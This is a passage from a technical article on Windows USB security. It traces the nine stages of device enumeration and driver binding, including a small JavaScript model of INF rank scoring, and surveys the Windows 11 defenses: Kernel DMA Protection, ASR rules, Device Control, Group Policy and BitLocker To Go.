    2019-2020 : Gen 7 : Thunderclap and Thunderspy ; IOMMU is not enough
    2018 : Gen 8 : Kernel DMA Protection ; Windows 10 1803
    2016 : Gen 9 : USB Type-C UCM stack ; Windows 10 1607
    2018-2024 : Gen 10 : ASR, Device Control, GPO triangle ; Defender for Endpoint

Sources, in row order: [@ms-usb-3-0-stack] for the USB 2.0 stack and the USB 3.0 KMDF rewrite; [@ms-kmcs] for the Vista x64 signing transition; [@krebs-feb2011] and [@nvd-cve-2010-2568] for the AutoRun-and-LNK lockdown; [@ncc-davis-2011] for the Andy Davis Black Hat 2011 talk; [@srlabs-badusb-pdf] and [@wiki-badusb] for the BadUSB three-author SR Labs disclosure; [@hak5-shop-ducky], [@hak5-ducky-docs], [@omg-cable], and [@bleeping-fin7] for the HID-as-weapon lineage; [@ndss-thunderclap] and [@thunderspy] for the IOMMU attack family; [@ms-kdp] and [@ms-dmaremap] for Kernel DMA Protection; [@ms-typec] for the Type-C UCM stack; [@ms-asr-rules], [@ms-devcontrol], [@ms-gpo-devinstall], and [@ms-devsetupclasses] for the modern enterprise policy triangle.

Note: Ten generations of Windows USB hardening. Signing on top, IOMMU underneath, policy frameworks around the edges. Every one of them addressed a surface adjacent to the descriptor parser. None addressed the contract the descriptor parser has to honor: that the peripheral's self-declared identity is the only identity the host gets. Until USB-IF Authentication 1.0 ships in commodity silicon, that contract is going to outlast every defense in this section.

Ten generations of hardening, each closing a single attack surface, each leaving the descriptor-trust contract intact. The single defense that should close it -- USB-IF Authentication 1.0, published January 2019 -- is the next section's reckoning.

5. The Modern USB Stack as a Multi-Stage Verifier

We have walked forty years of inheritance and ten generations of layered hardening. Now we are going to do the thing the rest of this article rests on: walk a single USB device, from the millisecond it makes electrical contact to the moment a class driver attaches to it, through the nine stages Windows 11 25H2 actually executes -- by named binary, by descriptor, by trust decision.

Those nine stages are a reorganisation of §1's eleven kernel-mode operations, not a different list. §1's three physical-detection operations -- port-status interrupt, port reset, speed detection -- fuse into Stage 1; §1's three default-address descriptor operations (initial 8-byte fetch, SET_ADDRESS, full 18-byte fetch) fuse into Stage 2; §1's combined INF-search-and-KMCS operation splits into Stages 6 and 7; and a new Stage 9 covers the IOMMU enforcement Kernel DMA Protection performs after the class driver attaches. The arithmetic is eleven minus two minus two plus one plus one equals nine. The StudyGuide question 1 at the foot of this article retains the §1 framing for exam purposes; the per-stage walk below uses the §5 reorganisation.
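The regrouping can be checked mechanically. The short Python sketch below encodes the mapping described above, with the §1 operations numbered 1 to 11 in list order; the dictionary and variable names are hypothetical, chosen only for this illustration.

```python
# Section 1 operation number -> Section 5 stage(s) it lands in.
STAGES_FOR_OPERATION = {
    1: [1],      # port-status-change interrupt
    2: [1],      # port reset
    3: [1],      # speed detection
    4: [2],      # first eight bytes of the device descriptor
    5: [2],      # SET_ADDRESS
    6: [2],      # full eighteen-byte device descriptor
    7: [3],      # configuration descriptor
    8: [4],      # composite split
    9: [5],      # hardware and compatible ID synthesis
    10: [6, 7],  # INF search, then the KMCS check
    11: [8],     # class driver attaches
}
NEW_STAGES = {9}  # IOMMU enforcement, which has no Section 1 counterpart

stages = {s for mapped in STAGES_FOR_OPERATION.values() for s in mapped} | NEW_STAGES
operation_count = len(STAGES_FOR_OPERATION)

print(operation_count, "operations ->", len(stages), "stages")
assert operation_count - 2 - 2 + 1 + 1 == len(stages) == 9
```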

sequenceDiagram
    participant Dev as USB device
    participant XHCI as usbxhci.sys (host controller)
    participant Hub as usbhub3.sys (hub driver)
    participant CCGP as usbccgp.sys (composite parent)
    participant PnP as PnP manager
    participant IO as I/O manager
    participant Cls as Class driver (e.g. hidclass.sys)
    Dev->>XHCI: Stage 1 -- electrical attach + port status change
    XHCI->>Dev: Port reset + speed detection
    XHCI->>Hub: New device on port N (default address 0)
    Hub->>Dev: Stage 2 -- GET_DESCRIPTOR (device, first 8 bytes)
    Hub->>Dev: SET_ADDRESS
    Hub->>Dev: GET_DESCRIPTOR (device, full 18 bytes)
    Hub->>Dev: Stage 3 -- GET_DESCRIPTOR (config, first 9 bytes)
    Hub->>Dev: GET_DESCRIPTOR (config, full wTotalLength)
    Hub->>CCGP: Stage 4 -- composite split (if bDeviceClass=0x00 or IAD present)
    CCGP->>PnP: Per-interface PDOs
    PnP->>PnP: Stage 5 -- synthesize hardware + compatible IDs
    PnP->>PnP: Stage 6 -- INF database search with rank scoring
    PnP->>IO: Stage 7 -- KMCS check on chosen function driver
    IO->>Cls: Stage 8 -- attach class driver to device node
    IO->>IO: Stage 9 -- IOMMU policy (KDP, if armed)

The sources for each stage are cited inline in the prose that follows. We will walk all nine.

Stage 1: Physical detection (`usbxhci.sys`)

The xHCI host controller's hardware raises a port-status-change interrupt when a downstream port detects electrical attach. The host-controller driver -- usbxhci.sys on Windows 8 and newer -- handles the interrupt, drives the port through a reset, and detects the device's negotiated speed: Low (1.5 Mbps), Full (12 Mbps), High (480 Mbps), Super (5 Gbps), or Super+ Speed (10 Gbps and beyond) [@wiki-usb]. Microsoft's architecture documentation names this verbatim: "The xHCI driver is the USB 3.0 host controller driver" and pairs it with the framework-derived host-controller extension Ucx01000.sys [@ms-usb-3-0-stack]. The device, at this point, has no identity. It has a port number and a speed. It does not yet have a USB bus address; it lives at the default address (zero) until the hub assigns one.

Stage 2: Initial device-descriptor fetch (`usbhub3.sys`)

The hub driver, usbhub3.sys, issues the first control transfer. The request is bmRequestType=0x80, bRequest=GET_DESCRIPTOR, wValue=0x0100, wLength=8 -- "give me the first eight bytes of the device descriptor at default address zero." The first eight bytes carry the bMaxPacketSize0 field, which tells the host how to size subsequent control transfers. SET_ADDRESS assigns a real bus address. A second GET_DESCRIPTOR then retrieves the full eighteen-byte USB_DEVICE_DESCRIPTOR.
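As a rough illustration of that first control transfer, the sketch below serializes the eight-byte SETUP packet described above and reads bMaxPacketSize0 out of an eight-byte reply. The helper names (`buildSetupPacket`, `parseDeviceDescriptorPrefix`) and the sample reply bytes are made up for illustration; this is a model of the wire format, not of how usbhub3.sys is implemented.

```javascript
// Sketch only: models the first GET_DESCRIPTOR exchange, not usbhub3.sys internals.
const GET_DESCRIPTOR = 0x06;         // standard request code for GET_DESCRIPTOR
const DESCRIPTOR_TYPE_DEVICE = 0x01; // high byte of wValue selects the descriptor type

// Hypothetical helper: serialize a SETUP packet (multi-byte fields are little-endian).
function buildSetupPacket({ bmRequestType, bRequest, wValue, wIndex, wLength }) {
  const bytes = new Uint8Array(8);
  const view = new DataView(bytes.buffer);
  view.setUint8(0, bmRequestType);
  view.setUint8(1, bRequest);
  view.setUint16(2, wValue, true);
  view.setUint16(4, wIndex, true);
  view.setUint16(6, wLength, true);
  return bytes;
}

// Hypothetical helper: read the fields the host needs from the first eight bytes.
function parseDeviceDescriptorPrefix(bytes) {
  if (bytes.length < 8) throw new RangeError("short device-descriptor prefix");
  if (bytes[1] !== DESCRIPTOR_TYPE_DEVICE) throw new TypeError("not a device descriptor");
  return { bLength: bytes[0], bMaxPacketSize0: bytes[7] };
}

const setup = buildSetupPacket({
  bmRequestType: 0x80,                       // device-to-host, standard, device recipient
  bRequest: GET_DESCRIPTOR,
  wValue: (DESCRIPTOR_TYPE_DEVICE << 8) | 0, // 0x0100: device descriptor, index 0
  wIndex: 0,
  wLength: 8,
});
const setupHex = Array.from(setup, b => b.toString(16).padStart(2, "0")).join(" ");

// Made-up reply from a device that reports a 64-byte endpoint-zero packet size.
const reply = Uint8Array.from([0x12, 0x01, 0x00, 0x02, 0x00, 0x00, 0x00, 0x40]);
const prefix = parseDeviceDescriptorPrefix(reply);

console.log(setupHex);               // 80 06 00 01 00 00 08 00
console.log(prefix.bMaxPacketSize0); // 64
```

Every byte of `reply` is chosen by the peripheral, which is why even this eight-byte read already counts as adversarial input.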

This is the descriptor parser's first contact with attacker-controlled bytes -- the surface Andy Davis demonstrated as exploitable at Black Hat 2011 [@ncc-davis-2011]. The binary doing the parsing is usbhub3.sys, the same hub driver §4 Generation 4 names verbatim from the architecture reference [@ms-usb-3-0-stack]. The hub driver runs in ring zero. The bytes it parses originate in the peripheral's firmware. The trust contract is one-way.

Stage 3: Configuration-descriptor fetch

The hub driver issues a third GET_DESCRIPTOR for the first nine bytes of USB_CONFIGURATION_DESCRIPTOR to learn the wTotalLength field; a fourth fetch retrieves the full configuration, which includes one or more USB_INTERFACE_DESCRIPTORs, each followed by its USB_ENDPOINT_DESCRIPTORs and any class-specific descriptors (HID report descriptors, mass-storage CSW formats, audio control units). The two-fetch pattern -- read nine bytes to learn the size, then re-read the full block -- is a perfectly sensible engineering optimization. It also doubles the number of attacker-controlled parser entries the hub driver executes per insertion. The pragmatic optimization and the widened attack surface are the same line of code. All of this is parsed in usbhub3.sys [@ms-usb-3-0-stack]. This stage is the bulk of the kernel's adversarial-input surface for USB.
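The two-fetch pattern can be sketched as a pair of small functions: one reads wTotalLength from the nine-byte header, the other walks the full block by bLength while refusing to trust any length field it has not bounds-checked. The function names and the sample bytes are hypothetical, and the checks shown are what a defensive parser might do, not a description of the checks usbhub3.sys actually performs.

```javascript
// Sketch only: a defensive walk over a configuration descriptor blob.
const DESC_CONFIGURATION = 0x02;

// First fetch: the nine-byte header tells the host how much to request next.
function readTotalLength(header) {
  if (header.length < 9 || header[0] < 9 || header[1] !== DESC_CONFIGURATION) {
    throw new RangeError("malformed configuration-descriptor header");
  }
  return header[2] | (header[3] << 8); // wTotalLength, little-endian
}

// Second fetch: walk every sub-descriptor, validating each device-supplied length.
function walkConfiguration(blob) {
  const total = readTotalLength(blob);
  if (total > blob.length) throw new RangeError("wTotalLength exceeds bytes received");
  const found = [];
  let offset = 0;
  while (offset < total) {
    if (offset + 2 > total) throw new RangeError("truncated descriptor header");
    const bLength = blob[offset];
    const bDescriptorType = blob[offset + 1];
    if (bLength < 2 || offset + bLength > total) {
      throw new RangeError(`bad bLength at offset ${offset}`);
    }
    found.push({ offset, bLength, bDescriptorType });
    offset += bLength;
  }
  return found;
}

// Made-up 25-byte configuration: config (9) + vendor-class interface (9) + endpoint (7).
const sampleConfig = Uint8Array.from([
  0x09, 0x02, 0x19, 0x00, 0x01, 0x01, 0x00, 0x80, 0x32,
  0x09, 0x04, 0x00, 0x00, 0x01, 0xff, 0x00, 0x00, 0x00,
  0x07, 0x05, 0x81, 0x03, 0x08, 0x00, 0x0a,
]);
const descriptorTypes = walkConfiguration(sampleConfig).map(d => d.bDescriptorType);
console.log(descriptorTypes.join(",")); // 2,4,5

// A hostile variant: the endpoint descriptor claims a zero length.
const hostileConfig = Uint8Array.from(sampleConfig);
hostileConfig[18] = 0x00;
let hostileRejected = false;
try { walkConfiguration(hostileConfig); } catch (e) { hostileRejected = e instanceof RangeError; }
console.log(hostileRejected); // true
```

Without the `bLength < 2` check, the zero-length descriptor in the hostile variant would leave `offset` unchanged and the loop would never terminate, a small example of how a single unvalidated field turns into a parser bug.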

A composite USB device is a single physical peripheral that declares multiple independent interfaces. A common pattern is a wireless-keyboard-and-mouse receiver that presents one USB interface for the keyboard and a second for the mouse. The host treats each interface as a separate logical device and binds a class driver to each. Composite-device handling is the structural primitive that makes the BadUSB *"mass storage device that also presents a HID keyboard interface"* attack possible inside an unmodified USB peripheral.

Stage 4: Composite-device split (`usbccgp.sys`)

If the device descriptor's bDeviceClass is 0x00 (deferred to interface), or its bDeviceClass / bDeviceSubClass / bDeviceProtocol triple is 0xEF / 0x02 / 0x01 (the Multi-Interface Function class signalled by Interface Association Descriptors), and the device has more than one interface and a single configuration, the hub bus driver synthesizes an additional compatible ID of USB\COMPOSITE. The PnP manager's INF search then matches that compatible ID against Usb.inf and loads the generic parent driver. Microsoft Learn states the architecture verbatim: "the USB generic parent driver (Usbccgp.sys) ... the generic parent driver enumerates each of these interfaces as a separate device" [@ms-ccgp]; the USB 3.0 architecture page is verbatim about which layer does the synthesis: "The hub driver enumerates and loads the parent composite driver if deviceClass is 0 or 0xef and numInterfaces is greater than 1 in the device descriptor" [@ms-usb-3-0-stack]. usbccgp.sys then creates one child physical device object (PDO) per interface and lets the PnP manager bind a class driver to each independently. This is the moment a single physical thumb drive can become a thumb drive and a HID keyboard. Nothing in this stage cross-checks whether the combination is a plausible product; the device has declared it, and the host honors the declaration.
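The decision described above reduces to a small predicate. The sketch below encodes only the conditions stated in this section; the function name `loadsCompositeParent` and the object shape are hypothetical, and the real hub driver may apply further checks that are not publicly documented.

```javascript
// Sketch only: the composite-parent decision as stated in the prose above.
function loadsCompositeParent(deviceDescriptor, bNumInterfaces) {
  const { bDeviceClass, bDeviceSubClass, bDeviceProtocol, bNumConfigurations } = deviceDescriptor;
  // 0x00 defers class information to the interface descriptors.
  const deferredToInterface = bDeviceClass === 0x00;
  // 0xEF / 0x02 / 0x01 signals Interface Association Descriptors.
  const multiInterfaceFunction =
    bDeviceClass === 0xef && bDeviceSubClass === 0x02 && bDeviceProtocol === 0x01;
  return (deferredToInterface || multiInterfaceFunction) &&
    bNumInterfaces > 1 &&
    bNumConfigurations === 1;
}

// Made-up descriptors for illustration.
const deferredDevice = { bDeviceClass: 0x00, bDeviceSubClass: 0x00, bDeviceProtocol: 0x00, bNumConfigurations: 1 };
const iadDevice = { bDeviceClass: 0xef, bDeviceSubClass: 0x02, bDeviceProtocol: 0x01, bNumConfigurations: 1 };

console.log(loadsCompositeParent(deferredDevice, 2)); // true: storage + keyboard interfaces
console.log(loadsCompositeParent(deferredDevice, 1)); // false: single interface
console.log(loadsCompositeParent(iadDevice, 3));      // true
```

Note what the predicate does not take as input: nothing about whether the declared interface combination is plausible for the product.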

Stage 5: Hardware-ID and compatible-ID synthesis

The PnP manager builds two ordered lists from the descriptor fields it just parsed:

Hardware IDs (most specific): USB\VID_xxxx&PID_xxxx&REV_xxxx, USB\VID_xxxx&PID_xxxx, and for composite devices USB\VID_xxxx&PID_xxxx&MI_xx (interface number) [@ms-hwids].
Compatible IDs (fallback): USB\Class_xx&SubClass_xx&Prot_xx, then USB\Class_xx&SubClass_xx, then USB\Class_xx [@ms-compatids].

A hardware ID is the most specific identifier the Plug-and-Play manager uses to bind a driver to a device. For USB, the canonical hardware ID is `USB\VID_xxxx&PID_xxxx&REV_xxxx`, derived directly from the device descriptor's `idVendor`, `idProduct`, and `bcdDevice` fields. A driver INF that names a hardware ID exactly will outrank any compatible-ID match in the rank-scored search; vendors use this to ship a vendor-specific function driver for their own hardware. A compatible ID is a generic identifier the Plug-and-Play manager falls back to when no driver INF names the device's hardware ID. For USB, compatible IDs are class-coded: `USB\Class_03&SubClass_01&Prot_01` is a boot-protocol keyboard, `USB\Class_08&SubClass_06&Prot_50` is a SCSI-transparent mass-storage device. The inbox Microsoft class drivers (`hidusb.sys`, `usbstor.sys`, and so on) are registered against compatible IDs, which is why an unbranded thumb drive with no vendor INF still gets a working class driver on Windows.
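The two ordered lists can be sketched as plain string formatting over descriptor fields. The helper names are hypothetical, the `bcdDevice` value is made up, and the sketch covers only the non-composite ID forms listed above.

```javascript
// Sketch only: ID strings built from descriptor fields, most specific first.
const hex = (value, width) => value.toString(16).toUpperCase().padStart(width, "0");

// Hardware IDs come from idVendor, idProduct, and bcdDevice in the device descriptor.
function hardwareIds({ idVendor, idProduct, bcdDevice }) {
  const base = `USB\\VID_${hex(idVendor, 4)}&PID_${hex(idProduct, 4)}`;
  return [`${base}&REV_${hex(bcdDevice, 4)}`, base];
}

// Compatible IDs come from the class / subclass / protocol triple.
function compatibleIds({ bClass, bSubClass, bProtocol }) {
  const cls = `USB\\Class_${hex(bClass, 2)}`;
  const sub = `${cls}&SubClass_${hex(bSubClass, 2)}`;
  return [`${sub}&Prot_${hex(bProtocol, 2)}`, sub, cls];
}

const device = { idVendor: 0x0951, idProduct: 0x1666, bcdDevice: 0x0110 }; // bcdDevice is made up
const massStorage = { bClass: 0x08, bSubClass: 0x06, bProtocol: 0x50 };

const hwIds = hardwareIds(device);
const compatIds = compatibleIds(massStorage);
console.log([...hwIds, ...compatIds].join("\n"));
```

Every input to both functions is a value the peripheral supplied during Stages 2 and 3.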

Stage 6: INF database search with rank scoring

The PnP manager hands the two lists to the driver-store INF search. The algorithm is documented under "How Setup Selects Drivers" [@ms-pnp-rank] and is rank-arithmetic: each candidate INF is assigned a 32-bit rank, lowest wins. Roughly speaking, the rank is composed from three terms: an ID-match term (hardware-ID hit beats compatible-ID hit, and a higher hardware-ID in the list beats a lower one), a signer-trust term (a Microsoft-signed driver outranks a third-party-signed driver of equal ID specificity), and an OS-version term. The chosen INF's [Models] section names the function driver [@ms-inf]. The two-phase driver-package model (introduced in Windows 8) first installs the best driver-store match for fast operation, then queries Windows Update separately for a potentially better match [@ms-pnp-rank].

Worked example. A USB Mass Storage device exposes hardware ID USB\VID_0951&PID_1666 (a Kingston DataTraveler) and compatible ID USB\Class_08&SubClass_06&Prot_50 (SCSI-transparent bulk-only). The driver store contains the Microsoft inbox INF (usbstor.inf) registered against the compatible ID and signed by Microsoft, and a third-party INF registered against the hardware ID and signed by a paid-up OEM. The rank arithmetic decides which one wins.

flowchart TD
    Dev["Device exposes:<br/>HWID=USB\VID_0951&PID_1666<br/>CompatID=USB\Class_08&SubClass_06&Prot_50"]
    Dev --> Store["Driver store search"]
    Store --> A["Candidate A: usbstor.inf<br/>Match on CompatID<br/>Signer: Microsoft (rank 0x00)"]
    Store --> B["Candidate B: vendor.inf<br/>Match on HWID<br/>Signer: OEM (rank 0x01)"]
    A --> ARank["A.rank = HWID_RANK_BASE + CompatID_term + 0x00<br/>= 0x0000 + 0x1003 + 0x00<br/>= 0x1003"]
    B --> BRank["B.rank = HWID_term + Signer_term<br/>= 0x0000 + 0x01<br/>= 0x0001"]
    ARank --> D{"Compare ranks (lowest wins)"}
    BRank --> D
    D --> Win["B wins: vendor.inf binds to USB\VID_0951&PID_1666"]

The exact numeric constants are policy-controlled and vary by Windows version; the structural ordering is documented [@ms-pnp-rank] [@ms-hwids] [@ms-compatids] [@ms-inf]. The takeaway is that a USB device with no hardware-ID-specific INF in the driver store falls back to whichever inbox class driver matches one of its compatible IDs, which is why an arbitrary thumb drive declaring bInterfaceClass=0x08 finds usbstor.sys ready to load.

{`
// Simplified model of the documented rank-scoring algorithm.
// Lower numeric rank wins; the exact constants are version-policy controlled.

const HWID_BASE = 0x0000;
const COMPATID_BASE = 0x1000;
const POSITION_STEP = 0x0001;
const SIGNER = { MICROSOFT: 0x00, OEM: 0x01, THIRD_PARTY: 0x02, UNSIGNED: 0x80 };

function rank(match) {
  const idTerm = match.kind === "HWID" ? HWID_BASE : COMPATID_BASE;
  const positionTerm = match.position * POSITION_STEP;
  return idTerm + positionTerm + SIGNER[match.signer];
}

const candidates = [
  { name: "usbstor.inf (Microsoft inbox)", kind: "COMPATID", position: 3, signer: "MICROSOFT" },
  { name: "vendor.inf (Kingston OEM)", kind: "HWID", position: 0, signer: "OEM" },
];

const ranked = candidates
  .map(c => ({ ...c, rank: rank(c).toString(16).padStart(4, "0") }))
  .sort((a, b) => parseInt(a.rank, 16) - parseInt(b.rank, 16));

for (const c of ranked) console.log(`rank=0x${c.rank} ${c.name}`);
console.log("Winner:", ranked[0].name);
`}

Stage 7: KMCS verification of the chosen driver

The function driver named in the winning INF is loaded. Before the I/O manager attaches it, the loader checks its signature against the Kernel-Mode Code Signing policy: signature must chain to a Microsoft-trusted root, use SHA-256, and -- if Hypervisor-Enforced Code Integrity is enabled -- pass HVCI's per-page integrity check. The driver block list and the vulnerable-driver block list are consulted. The full signing-by-version matrix is documented on Microsoft Learn [@ms-kmcs] [@ms-drvsigning].

This is the canonical aha moment of the article. Kernel-Mode Code Signing certifies the driver. It does not certify what the driver consumes.

Imagine the system from KMCS's point of view. The Microsoft-signed `hidclass.sys` arrives at the kernel-mode loader. Its signature chains to a Microsoft-trusted root, its hash is correct, the HVCI memory-integrity policy is satisfied. Everything KMCS is asked to verify is verified. `hidclass.sys` loads.

At runtime, hidclass.sys accepts whatever HID input event arrives on the wire. The bytes that arrive carry no signature. The peripheral that produced them was never authenticated. KMCS protects the kernel from a malicious driver; its threat model assumes the data the driver consumes is honest. Against BadUSB, that assumption is exactly backwards. The signed hidclass.sys becomes the attacker's tool: it is the binary that delivers the malicious keystrokes to the active session.

KMCS is not broken. The work it does is real and necessary; without it, the BadUSB primitive would also let an attacker load arbitrary .sys files. KMCS just does not solve, and is not in the threat model of, the descriptor-trust problem. That gap is the article's recurring point.

Stage 8: Class-driver attachment

With the rank scoring decided and the function driver KMCS-verified, the I/O manager attaches the driver to the new device node and the class driver begins serving I/O. The function driver is drawn from the inbox class-driver roster catalogued in §6 -- hidclass.sys and hidusb.sys for HID; usbstor.sys for mass storage; winusb.sys for vendor-specific generic access via the Microsoft OS Descriptor mechanism [@ms-winusb]; the UcmCx.sys family for Type-C connector management [@ms-typec]; and the rest of the inbox roster in §6 [@ms-usb-3-0-stack]. This is the moment a USB device transitions from a parsed PDO to a binding that exposes per-class I/O semantics to user mode -- the point at which descriptor trust becomes operational rather than merely synthesised.

Stage 9: IOMMU enforcement (Kernel DMA Protection)

If Kernel DMA Protection is armed and the device is externally connected via a PCIe-tunneling fabric (Thunderbolt 3, Thunderbolt 4, USB4), the platform IOMMU places the device behind a device-specific translation domain. Pre-login DMA is blocked. Post-login DMA is allowed only into the device's own sandboxed memory if the driver opted in with DmaRemappingCompatible=1 in its INF [@ms-dmaremap]. KDP performs the IOMMU-mediated peripheral confinement quoted verbatim in §4 Generation 8 [@ms-kdp]. The deeper architectural treatment of Windows's hypervisor-enforced isolation primitives lives in the sibling article on the secure kernel and Virtualization-Based Security.

An IOMMU is a hardware unit that sits between peripherals and main memory, translating peripheral-issued DMA addresses through a per-device page table the operating system controls. Intel's implementation is called VT-d; AMD's is AMD-Vi; ARM platforms expose a System Memory Management Unit (SMMU). With an IOMMU enabled and configured by the OS, a peripheral that issues a DMA read to an address outside its sandboxed memory region gets a translation fault instead of a successful read. Without an IOMMU -- or with the IOMMU not enforcing policy on a given device -- peripheral DMA is unrestricted physical-address access to the kernel.
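A toy model makes the translation-fault behavior concrete. The class below is a deliberately simplified sketch: one flat page map per device, 4 KiB pages, and invented names (`ToyIommu`, `tb-nic`). Real VT-d, AMD-Vi, and SMMU implementations use multi-level tables and hardware fault reporting that this does not attempt to model.

```javascript
// Sketch only: a per-device page table that either translates or faults.
const PAGE_SIZE = 4096;

class ToyIommu {
  constructor() {
    this.domains = new Map(); // deviceId -> Map(device page number -> physical page number)
  }

  // The OS grants a device access to exactly one physical page per call.
  map(deviceId, devicePage, physicalPage) {
    if (!this.domains.has(deviceId)) this.domains.set(deviceId, new Map());
    this.domains.get(deviceId).set(devicePage, physicalPage);
  }

  // A DMA access is translated only if the OS mapped that page for that device.
  translate(deviceId, deviceAddress) {
    const table = this.domains.get(deviceId);
    const page = Math.floor(deviceAddress / PAGE_SIZE);
    if (!table || !table.has(page)) return { fault: true };
    return {
      fault: false,
      physicalAddress: table.get(page) * PAGE_SIZE + (deviceAddress % PAGE_SIZE),
    };
  }
}

const iommu = new ToyIommu();
iommu.map("tb-nic", 0, 0x8000); // hypothetical device with one sandboxed page

const inside = iommu.translate("tb-nic", 0x10);    // within the mapped page
const outside = iommu.translate("tb-nic", 0x5000); // page 5 was never mapped
const stranger = iommu.translate("unknown-device", 0x10);

console.log(inside.physicalAddress.toString(16)); // 8000010
console.log(outside.fault, stranger.fault);       // true true
```

The contrast case in the paragraph above, no IOMMU or no enforced policy, corresponds to a `translate` that returns the device's address unchanged for any input.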

A USB 2.0 thumb drive performs no DMA. KDP is silent on it.

Note: Kernel DMA Protection is a Thunderbolt-and-PCIe-over-USB-C defense. It does not apply to USB 2.0 mass storage, HID, or audio. It does not apply to a USB 3.x flash drive talking the Mass Storage Class. It applies to PCIe peripherals tunneled over the same physical connector. If your threat model is "a malicious thumb drive types Mimikatz into my Start menu," KDP is not in your defense chain at all.

flowchart TD
    subgraph HC["Host controller layer"]
        XHCI["usbxhci.sys<br/>USB 3.0 host controller driver"]
        UCX["Ucx01000.sys<br/>USB host controller extension (KMDF)"]
    end
    subgraph Hub["Hub layer"]
        H["usbhub3.sys<br/>USB 3.0 hub and enumeration"]
    end
    subgraph Comp["Composite split"]
        CCGP["usbccgp.sys<br/>generic parent: one PDO per interface"]
    end
    subgraph Class["Class-driver layer"]
        HID["hidclass.sys + hidusb.sys<br/>HID class"]
        STOR["usbstor.sys<br/>Mass Storage Class"]
        AUDIO["usbaudio2.sys<br/>Audio Class 2.0"]
        VIDEO["usbvideo.sys<br/>USB Video Class (UVC)"]
        SER["usbser.sys<br/>CDC Serial"]
        WIN["winusb.sys<br/>Generic vendor access"]
        UCM["UcmCx / UcmUcsiCx / UcmTcpciCx<br/>USB Type-C connector"]
    end
    XHCI --> UCX
    UCX --> H
    H --> CCGP
    CCGP --> HID
    CCGP --> STOR
    CCGP --> AUDIO
    CCGP --> VIDEO
    CCGP --> SER
    CCGP --> WIN
    CCGP --> UCM

Sources for the architecture diagram, layer by layer: [@ms-usb-3-0-stack] for the host-controller and hub layers (usbxhci.sys, Ucx01000.sys, usbhub3.sys); [@ms-ccgp] for the composite parent driver usbccgp.sys; [@ms-winusb] for winusb.sys; [@ms-typec] for the UCM class-extension family.

Key idea: Of the nine stages Windows executes between physical insertion and a class-driver attach, only two -- Stages 7 and 9 -- consult anything Windows holds as cryptographic truth. The other seven trust whatever the peripheral says, the moment the peripheral says it. KMCS certifies the driver, not the device. KDP certifies the bus, not the descriptor. The descriptor-trust gap is structural to USB; it lives in Stages 2 through 6, and no Windows-side defense has ever proposed to close it.

Nine stages. Two of them are the security model the article's reader thought was the security model. The other seven are descriptor parsing, ID synthesis, and INF search -- and they trust whatever the peripheral declares.

6. What Ships in Windows 11 24H2 / 25H2

Section 5 was the pipeline. This section is the roster: every Windows-11-shipping mechanism that defends the USB attack surface, what it actually does, and -- in the table at the end of this section -- what it does not.

The inbox class-driver roster. The class drivers that bind to a USB device after Stage 6 are mostly Microsoft-authored and ship in every Windows 11 SKU. They include hidclass.sys and hidusb.sys for keyboards, mice, joysticks, and HID-over-USB; usbstor.sys for the Mass Storage Class; usbprint.sys for the Printer Class; usbaudio2.sys for USB Audio Class 2.0; usbvideo.sys for the USB Video Class (webcams); usbser.sys for the CDC Serial class; winusb.sys for vendor-specific generic-access scenarios; the UcmCx.sys family for Type-C connector management; Hidi2c.sys for HID-over-I2C; and wpdusb.sys for MTP / PTP Windows Portable Devices [@ms-usb-3-0-stack] [@ms-typec] [@ms-winusb]. Every class driver in that list is signed under the Kernel-Mode Code Signing policy [@ms-kmcs]. Every class driver in that list trusts the descriptor that selected it. Hidi2c.sys is the sleeper attack surface on most laptops. Internal precision touchpads, fingerprint readers, and increasingly proximity sensors are HID-over-I2C devices wired to the chipset, not the external USB bus. They are not subject to USB-side Device Control policy because they are not USB devices; they are HID devices that happen to talk a different transport. The HID class definition is the same as it is on USB.

Kernel DMA Protection policy surface. KDP exposes three Group Policy values on DMAGuard\DeviceEnumerationPolicy: Block all (the most restrictive posture), Only after log in or screen unlock (the default), and Allow all. The Microsoft Learn reference is verbatim about the default behavior: "By default, peripherals with DMA Remapping incompatible drivers are blocked from starting and performing DMA until an authorized user signs into the system or unlocks the screen" [@ms-kdp]. KDP's silicon and firmware prerequisites (IOMMU support, UEFI DMAR / IVRS publication) are non-trivial; on many post-2019 OEM platforms the toggle ships in BIOS but stays off until an administrator changes the firmware setting.

The ASR + Device Control + GPO triangle. The three deployable layers of enterprise USB policy on Windows 11 are an Attack Surface Reduction rule, the Microsoft Defender for Endpoint Device Control framework, and the older Group Policy Device Installation Restrictions family.

Attack Surface Reduction is a set of policy-defined kernel-and-userland rules in Microsoft Defender for Endpoint that block specific abusable behaviors. Each rule is identified by a GUID and toggled per-rule by Group Policy, Intune, or PowerShell. ASR rules sit in front of common execution sinks (Office child processes, script-from-email runs, USB-borne executables) and refuse the operation when the rule is in Block mode. They are a policy layer on top of the Windows execution model, not a re-design of it.

The ASR rule that targets USB-borne malware is "Block untrusted and unsigned processes that run from USB", GUID b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 on Microsoft's ASR-rule-to-GUID matrix [@ms-asr-rules]. (Several published guides cite the unrelated GUID d4f940ab-401b-4efc-aadc-ad5f3c50688a for the same rule; per the matrix that GUID is actually "Block all Office applications from creating child processes". The corrected USB GUID is the one to deploy.) Microsoft Defender for Endpoint Device Control is the granular layer: groups, rules, and settings let an administrator allow read-only-for-corporate-encrypted-USB, deny-write-for-personal-USB, allow corporate HID by VID/PID/serial, and a dozen other primitive combinations per-user [@ms-devcontrol]. The older Group Policy Device Installation Restrictions framework has eight policies (AllowedDeviceClasses, DenyDeviceClasses, AllowedDeviceIDs, DenyDeviceIDs, and so on) and uses Setup Class GUIDs such as GUID_DEVCLASS_USB ({36FC9E60-C465-11CF-8056-444553540000}) and GUID_DEVCLASS_HIDCLASS ({745A17A0-74D3-11D0-B6FE-00A0C90F57DA}) for class-wide rules [@ms-gpo-devinstall] [@ms-devsetupclasses].

BitLocker To Go. The full-volume-encryption story for removable media on Windows has been BitLocker To Go since Windows 7. On Windows 11 the default cipher is XTS-AES-128 (administrators can promote to XTS-AES-256 via the Group Policy "Choose drive encryption method and cipher strength" under Removable Data Drives), and the Group Policy "Deny write access to removable drives not protected by BitLocker" is the enterprise opt-in to force the contract [@ms-bitlocker]. BitLocker To Go protects the data on a USB stick if it is lost or stolen. It does not protect the host from a malicious peripheral, because the malicious peripheral does not present itself as a BitLocker-managed volume; it presents itself as whatever it pleases at Stage 5.

